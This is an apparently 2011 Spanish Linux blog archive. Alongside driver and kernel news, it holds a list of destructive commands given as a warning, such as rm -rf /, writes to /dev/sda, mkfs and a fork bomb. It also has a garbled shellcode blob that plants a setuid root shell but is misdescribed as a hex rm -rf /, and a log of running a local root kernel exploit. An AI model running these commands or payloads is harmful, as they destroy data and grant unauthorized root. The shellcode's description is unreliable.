Si tan facil fuera de tener Gentoo, hasta las chicas del anime podrian hacerlo?, LOL!!!
miércoles, 22 de junio de 2011
sábado, 18 de junio de 2011
Recopilaciòn de comandos peligrosos
Hola, aca les traigo una lista de comandos peligrosos para GNU/Linux para evitar que les pase algo y pierdan a su precisosa distro :)
Mirar pero no ejecutar nunca como root !!:
cat /dev/urandom > /dev/sda
Mala idea, ese comando lo que hace es pasar todos los datos de urandom, al bloque del disco duro, causando que pierdas los datos y las particiones.
rm -rf /
El conocido comando mortal, este borra absolutamente todo lo que este, incluso los datos de otras particiones si es que estan montadas.
chmod -R 777 /
Chmod es una muy buena herramienta para asignar permisos, pero nunca ejecutar asi, eso dañaria la instalacion de su distro y al reiniciar seria irrancable, lo bueno es que los datos del directorio home al estar con el permiso universal 777 se pueden recuperar, pero nada mas :S desde un live cd.
dd if=/dev/random of=/dev/port
Menos mortal, pero si te puede dar molestias. Al pasar los datos de /dev/random a /dev/port causaras un kernel panic, con reinicio regresa a la normalidad.
mv /home/yourhomedirectory/* /dev/null
Esto te pasara los datos de tu home a un punto nulo /dev/null (el agujero negro de Unix), y no los podras recuperar mas
chmod 000 -R /
Otra variante del chmod usado mal, ahora el permiso 000 te denegara el acceso a todo :S, no ejecutar nunca.
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Version Hexadecimal del rm -rf /, puede pasar desapercibida hasta en los usuarios mas expertos, ni se les ocurra ejecutarla.
mkfs.ext3 /dev/sda
Esto elimina los datos del dispositivo seleccionado, no hacerlo o perderan sus datos.
cat /dev/input/mouse0 > /dev/sda
Otro comando peligroso, la peor manera de sacar la salida del raton, esa va directo al /dev/sda y con ello la perdida de datos, particiones, muy peligrosa.
:(){ :|:& };:
Una conocida Bomba Fork, lo que hace es crear muchos procesos hasta colapsar al sistema, y con ello obliga al reinicio del sistema, y en el peor de los casos, perdida de datos.
chmod -x chmod
Esta tambien causa que el sistema quede en mal estado.
Recuerden nunca ejecutar esos comandos como root u de otra manera o sino les causara problemas, dolores de cabeza y lo peor perdida de datos.
jueves, 16 de junio de 2011
Exploit kernel linux
Un ya reconocido exploit uno de tipo local exploit permite obtener a root, desde el kernel 2.6.30, en muchos que no han sido parcheados o sea vanilla aun funciona en esos...
En mi caso no funciono, lo probe en el nuevo kernel 3.0 en Gentoo, para ser exactos el 3.0_rc3.
Requerimientos:
Tener el paquete build-essential en debian o derivados ya instalado (en Gentoo ya viene con todo lo necesario ya):
#apt-get install build-essential
luego:
$gcc exploit.c -o exploit
probar:
[dexter4@Kagamine:~/Descargas_Opera/cheddar_bay]% ./exploit
[+] MAPPED ZERO PAGE!
[+] Resolved nf_unregister_hooks to 0xc13e0df6
[+] Resolved commit_creds to 0xc1033767
[+] *0x2c |= 1
[+] b00m!
[+] Disabled security of : nothing, what an insecure machine!
[+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?
[dexter4@Kagamine:~/Descargas_Opera/cheddar_bay]% uname -a
Linux Kagamine 3.0.0-rc3 #1 PREEMPT Wed Jun 15 16:47:18 CLT 2011 i686 Intel(R) Pentium(R) 4 CPU 1.60GHz GenuineIntel GNU/Linux
al final no pudo obtener root, en mi caso pero casi fue, recuerden no hacer trampa y cerrar toda sesion de root anteriormente :)
Recuerden no abusar de los exploit, es solo para fines de aprendizaje, o similar...
sábado, 11 de junio de 2011
Miles de Temas de Wmaker
viernes, 20 de mayo de 2011
Disponible el núcleo de Linux versión 2.6.39
Entre lo cambios más destacado, por fin se eliminan los últimos vestigios de BKL (Big Kernel Lock); Ext4 ahora utiliza la función mblk_io_submit de modo predeterminado, misma que mejora el desempeño y mejora la escalabilidad; quien tenga interés en un muro cortafuegos con Linux, podrá utilizar el código de ipset, el cual se presume es más eficiente y fácil de administrar;
Este lanzamiento, que demoró tan solo 70 días en completarse, es evidencia de que se ha acelerado el procesos de desarrollo, pues anteriormente se demoraba de 80 a 90 días e hacer un lanzamiento.
http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.39.tar.bz2
Fuente: The H-Open
PD : aun no solucionan el problema de energia con los portatiles, para el 2.6.40 deberia de estar de solucionado, eso espero. por ahora puedes saldarlo usando otro sheduller como el BFS, etc ...
domingo, 24 de abril de 2011
Fallas IE9
Si se habran fijado Internet Explorer 9 anda mejor en maquinas windows, pero tiene fails como este:
Una descripcion de seguridad que dice:
Dice: Proteccion contra el hardware malicioso (malware), deberia decir: Proteccion contra el software malicioso (malware) xDDDDDD, salia en la pagina en español que describia eso
Y este Fallo: decia hasta cerrar windows explorer (Fail!!):
sábado, 5 de febrero de 2011
Importante actualización de los drivers libres de ATI

Ya era hora de actualizar nuestros drivers de la tarjeta gráfica. ATI acaba de liberar una actualización mayor para poder soportar nuevas tarjetas, mejorar el rendimiento de las anteriores y añadir opciones que en entornos de software libre no funcionaban. La nueva versión (6.14.0) de los drivers de X.Org añaden soporte a las Radeon HD 5000 series, Radeon HD 6000 series, y al hardware AMD Fusion Ontario.
Por supuesto, además de novedades, parchean gran cantidad de bugs con los que venían peleándose hace algún tiempo. Aún no existe un paquete oficial para facilitar la instalación de estos nuevos drivers así que si queréis instalarlos debéis compilarlos directamente desde los repositorios Git.
Las mejoras incluidas en la nueva versión pasan por el soporte para 2D EXA, aceleración hardware para la reproducción de archivos de vídeo mediante X-Video y optimización de rendimiento.
Otra importante mejora es la que incluye el KMS page-flipping, una tecnología que mejora enormemente el rendimiento de las tarjetas.
Para poder utilizar éste driver con las últimas tarjetas será necesario utilizar el kernel 2.6.38. Esto supone un pequeño problema ya que dicho kernel todavía no es estable y no se espera que salga a producción hasta dentro de unas semanas.
De todas formas, una excelente noticia para el software libre y todos los usuarios que utilicen tarjetas ATI.
Via: Phoronix
Ps: andan mejor, pero hay un bug, cuando abres una terminal como urxvt, la pantalla sale destruida y no queda mas remedio que reiniciar las X, con las demas terminales ok, y al compiz-fusion se le fue ese problema de refresco en que a veces las ventanas no recargaban
Update: si se añade en la seccion device la opcion en /etc/X11/xorg.conf:
Option "ColorTiling" "False"
reiniciar las X
se va el garbage al abrir la urxvt, y funciona normal




